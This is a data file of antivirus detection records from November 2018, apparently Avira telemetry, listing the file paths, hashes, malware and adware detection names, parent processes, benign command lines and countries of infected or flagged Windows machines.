  Row(detection=Row(filename='textures.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL13\\TEXTURES\\TEXTURES.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='27e946580ebd3a67750c862d3cce6b9573f1e3e495ebccfe9a67f563208fdf59', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lightmaps.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL14\\lightmaps\\lightmaps.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='27e946580ebd3a67750c862d3cce6b9573f1e3e495ebccfe9a67f563208fdf59', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-130847-63adeb64', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-130408-3969CC04\\AVSCAN-20181102-130847-63ADEB64', filesize=1024000, name='Adware/CsdiMonetize.ajkoe.#M1.#R1'), hash='27ed231f47ab2f749185418f33ea7c237230d8c3a1b98ccdbcd1d008af125c21', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:08:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131018-714acd00', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-130408-3969CC04\\AVSCAN-20181102-131018-714ACD00', filesize=1024000, name='Adware/CsdiMonetize.ajkoe.#M1.#R1'), hash='27ed231f47ab2f749185418f33ea7c237230d8c3a1b98ccdbcd1d008af125c21', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:10:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131044-753ee289', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-130408-3969CC04\\AVSCAN-20181102-131044-753EE289', filesize=1024000, name='Adware/CsdiMonetize.ajkoe.#M1.#R1'), hash='27ed231f47ab2f749185418f33ea7c237230d8c3a1b98ccdbcd1d008af125c21', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:10:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131131-7c5f90e0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-130408-3969CC04\\AVSCAN-20181102-131131-7C5F90E0', filesize=1024000, name='Adware/CsdiMonetize.ajkoe.#M1.#R1'), hash='27ed231f47ab2f749185418f33ea7c237230d8c3a1b98ccdbcd1d008af125c21', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:11:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131108-78d65db5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-130408-3969CC04\\AVSCAN-20181102-131108-78D65DB5', filesize=1024000, name='Adware/CsdiMonetize.ajkoe.#M1.#R1'), hash='27ed231f47ab2f749185418f33ea7c237230d8c3a1b98ccdbcd1d008af125c21', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:11:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131156-80285211', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-130408-3969CC04\\AVSCAN-20181102-131156-80285211', filesize=1024000, name='Adware/CsdiMonetize.ajkoe.#M1.#R1'), hash='27ed231f47ab2f749185418f33ea7c237230d8c3a1b98ccdbcd1d008af125c21', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:11:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-131220-83bf0325', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-130408-3969CC04\\AVSCAN-20181102-131220-83BF0325', filesize=1024000, name='Adware/CsdiMonetize.ajkoe.#M1.#R1'), hash='27ed231f47ab2f749185418f33ea7c237230d8c3a1b98ccdbcd1d008af125c21', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:12:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-130951-6d4c5cf7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-130408-3969CC04\\AVSCAN-20181102-130951-6D4C5CF7', filesize=1024000, name='Adware/CsdiMonetize.ajkoe.#M1.#R1'), hash='27ed231f47ab2f749185418f33ea7c237230d8c3a1b98ccdbcd1d008af125c21', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:09:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-130921-68d3162e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-130408-3969CC04\\AVSCAN-20181102-130921-68D3162E', filesize=1024000, name='Adware/CsdiMonetize.ajkoe.#M1.#R1'), hash='27ed231f47ab2f749185418f33ea7c237230d8c3a1b98ccdbcd1d008af125c21', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:09:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wisper.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\is-V0IPM.tmp\\Wisper.exe', filesize=1024000, name='Adware/CsdiMonetize.ajkoe.#M1.#R1'), hash='27ed231f47ab2f749185418f33ea7c237230d8c3a1b98ccdbcd1d008af125c21', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:38:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='d6d48977c0b00562075afcde578ab9223d4e96b7', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\d6d48977c0b00562075afcde578ab9223d4e96b7', filesize=2880000, name='TR/Crypt.XPACK.Gen2.#M300.#R100322'), hash='2836c5ad99f9bd0ecd7f538db9d2b04db0df5e6f2703fd8f263b452b4338a329', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:31:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-212812-364abe59', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c7c86a7c\\AVSCAN-20181102-212445-0265EB6B\\AVSCAN-20181102-212812-364ABE59', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='2856f75836e80cef64f96f94263227ae845897202542f05f4fbf00f1b215b97e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:28:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='minimap-sidebar-0317-fx-downloader.exe', filepath='L:\\Users\\X\\Downloads\\minimap-sidebar-0317-fx-Downloader.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='2856f75836e80cef64f96f94263227ae845897202542f05f4fbf00f1b215b97e', metadata=Row(cmdline='\\\\\\/Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\dllhost.exe', parentsize=19360, timestamp='2018-11-02T17:17:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='28638453117ca2d992efeca0d6db1da00cb180d109b7edb408dfb8f26b776fe1', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-18\\28638453117CA2D992EFECA0D6DB1DA00CB180D109B7EDB408DFB8F26B776FE1', filesize=256000, name='TR/Patched.Gen.#M300.#R2947'), hash='28638453117ca2d992efeca0d6db1da00cb180d109b7edb408dfb8f26b776fe1', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:59:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='consoleapplication1.exe', filepath='\\\\?\\C:\\Users\\X\\Documents\\Visual Studio 2017\\Projects\\EmptyProject1\\x64\\Debug\\ConsoleApplication1.exe', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='28b528023ad5d69fb89488a4da2e8e74173bbc4a0e0c17a8e31392086cabd6b4', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:13:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='consoleapplication1 (2017_06_17 11_23_43 utc).exe', filepath='\\\\?\\Y:\\FileHistory\\Ty\\AION\\Data\\C\\Users\\Ty\\Documents\\Visual Studio 2017\\Projects\\EmptyProject1\\x64\\Debug\\ConsoleApplication1 (2017_06_17 11_23_43 UTC).exe', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='28b528023ad5d69fb89488a4da2e8e74173bbc4a0e0c17a8e31392086cabd6b4', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T21:18:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ophcrack.exe', filepath='H:\\HBCD\\Programs\\OPHCrack.exe', filesize=64000, name='TR/Agent.64000.101.#M1.#R1'), hash='28d02d53172d5486e395b7cc2768e91b922defe83fe554f97d652a3879527a70', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T22:11:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ophcrack.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\OPHCrack.exe", filesize=64000, name='TR/Agent.64000.101.#M1.#R1'), hash='28d02d53172d5486e395b7cc2768e91b922defe83fe554f97d652a3879527a70', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:17:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101851-954231de', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-101851-954231DE', filesize=64000, name='TR/Agent.64000.101.#M1.#R1'), hash='28d02d53172d5486e395b7cc2768e91b922defe83fe554f97d652a3879527a70', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:18:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ophcrack.exe', filepath='E:\\HBCD\\Programs\\OPHCrack.exe', filesize=64000, name='TR/Agent.64000.101.#M1.#R1'), hash='28d02d53172d5486e395b7cc2768e91b922defe83fe554f97d652a3879527a70', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:21:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082804-9d5a65a1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-082729-98D810FE\\AVSCAN-20181102-082804-9D5A65A1', filesize=64000, name='TR/Agent.64000.101.#M1.#R1'), hash='28d02d53172d5486e395b7cc2768e91b922defe83fe554f97d652a3879527a70', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:28:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-222440-b246904f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-222356-ABC2D34B\\AVSCAN-20181102-222440-B246904F', filesize=64000, name='TR/Agent.64000.101.#M1.#R1'), hash='28d02d53172d5486e395b7cc2768e91b922defe83fe554f97d652a3879527a70', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:24:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221529-5f172c0c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221529-5F172C0C', filesize=64000, name='TR/Agent.64000.101.#M1.#R1'), hash='28d02d53172d5486e395b7cc2768e91b922defe83fe554f97d652a3879527a70', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:15:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='f1d3d.exe', filepath='H:\\GAMES\\العاب\\عربيات فورمالا 1\\F1d3d.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='28d6b77a9347e43d8ffd34ce36151204896291908ac4410b58cf7c6260c48955', metadata=Row(cmdline='Copy *\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\TeraCopy\\\\\\\\FileList.dat\\\\\\" \\\\\\"K:\\\\\\\\\\\\\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\TeraCopy\\TeraCopy.exe', parentsize=3345552, timestamp='2018-11-02T14:44:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='d:\\windows\\softwaredistribution\\download\\4d6e4034e4de9833cc65805f6368103f\\x86_windowssearchengine_31bf3856ad364e35_7.0.7601.23930_none_75d1609092e92648\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='2914ccbab7d20587d7ea59b3cbd8fff81972c4baf00d97d3582ca0362b73eaeb', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:38:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='goku ssj2.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Goku SSJ2\\Goku SSJ2.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='29333556b4547765d896ff32c962acf584d533e271aa086092377fa3f57b2078', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='\\\\?\\C:\\Windows\\system32\\config\\aol\\2\\1\\1\\2\\2\\1\\1\\1\\1\\1\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.71.#M1.#R1'), hash='298cbe85ed29c3da3c0911f41b694304300d80e5b7bb00626165260169b0ac87', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:20:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='\\\\?\\C:\\WINDOWS\\SysWOW64\\config\\1\\1\\2\\3\\1\\1\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.71.#M1.#R1'), hash='298cbe85ed29c3da3c0911f41b694304300d80e5b7bb00626165260169b0ac87', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:44:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vrtc1aa.tmp', filepath='L:\\Users\\X\\AppData\\Local\\Temp\\VRTC1AA.tmp', filesize=2432000, name='TR/Crypt.Agent.aekxs.#M300.#R1234'), hash='298e393a417f4ee9d48016115a30cd0f26a09a5e0dd9eff8c2aca8af03df7b6f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T12:16:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2a00852fb0394596bbbff9ea372f6fc734b90bc5e4d48c33cca9bc944e313232', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2A00852FB0394596BBBFF9EA372F6FC734B90BC5E4D48C33CCA9BC944E313232', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2a00852fb0394596bbbff9ea372f6fc734b90bc5e4d48c33cca9bc944e313232', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:12:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2a00852fb0394596bbbff9ea372f6fc734b90bc5e4d48c33cca9bc944e313232', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2A00852FB0394596BBBFF9EA372F6FC734B90BC5E4D48C33CCA9BC944E313232', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2a00852fb0394596bbbff9ea372f6fc734b90bc5e4d48c33cca9bc944e313232', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:19:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2a00852fb0394596bbbff9ea372f6fc734b90bc5e4d48c33cca9bc944e313232', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2A00852FB0394596BBBFF9EA372F6FC734B90BC5E4D48C33CCA9BC944E313232', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2a00852fb0394596bbbff9ea372f6fc734b90bc5e4d48c33cca9bc944e313232', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:44:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155732-6ac26b76', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_40ba6c09\\AVSCAN-20181102-155130-3C8576E2\\AVSCAN-20181102-155732-6AC26B76', filesize=212000, name='PUA/OptimizerPro.Gen.#M300.#R6073'), hash='2a33ac6bc880560eada16c962b64dd9835ad890bda09f8d14095db0882703f16', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:57:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='optprostart.exe', filepath='C:\\Program Files\\Optimizer Pro\\OptProStart.exe', filesize=212000, name='PUA/OptimizerPro.Gen.#M2.#R6073'), hash='2a33ac6bc880560eada16c962b64dd9835ad890bda09f8d14095db0882703f16', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:31:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-180457-1ef3eb9b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_06da8660\\AVSCAN-20181102-175748-E82542AD\\AVSCAN-20181102-180457-1EF3EB9B', filesize=212000, name='PUA/OptimizerPro.Gen.#M300.#R6073'), hash='2a33ac6bc880560eada16c962b64dd9835ad890bda09f8d14095db0882703f16', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:04:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-233730-35e656bf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_895e5944\\AVSCAN-20181102-231658-9FA99280\\AVSCAN-20181102-233730-35E656BF', filesize=212000, name='PUA/OptimizerPro.Gen.#M300.#R6073'), hash='2a33ac6bc880560eada16c962b64dd9835ad890bda09f8d14095db0882703f16', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:37:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-150732-a9d5263a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_38c697ad\\AVSCAN-20181102-145422-44E8A08C\\AVSCAN-20181102-150732-A9D5263A', filesize=1132000, name='PUA/Dlhelper.Gen7.#M300.#R601597'), hash='2a6cf33ead307d9e2823a323aa11ce008a616f298d880e03ee1f61f8943070a7', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:07:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2a7fc39d96c8b7aa8be1efd74c3ffb5e015e968c271ca4e66b59ed939f1ec5b2', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2A7FC39D96C8B7AA8BE1EFD74C3FFB5E015E968C271CA4E66B59ED939F1EC5B2', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2a7fc39d96c8b7aa8be1efd74c3ffb5e015e968c271ca4e66b59ed939f1ec5b2', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:19:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2a7fc39d96c8b7aa8be1efd74c3ffb5e015e968c271ca4e66b59ed939f1ec5b2', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2A7FC39D96C8B7AA8BE1EFD74C3FFB5E015E968C271CA4E66B59ED939F1EC5B2', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2a7fc39d96c8b7aa8be1efd74c3ffb5e015e968c271ca4e66b59ed939f1ec5b2', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:44:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2a7fc39d96c8b7aa8be1efd74c3ffb5e015e968c271ca4e66b59ed939f1ec5b2', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2A7FC39D96C8B7AA8BE1EFD74C3FFB5E015E968C271CA4E66B59ED939F1EC5B2', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2a7fc39d96c8b7aa8be1efd74c3ffb5e015e968c271ca4e66b59ed939f1ec5b2', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:12:55Z'), dt=datetime.date(2018, 11, 2)),
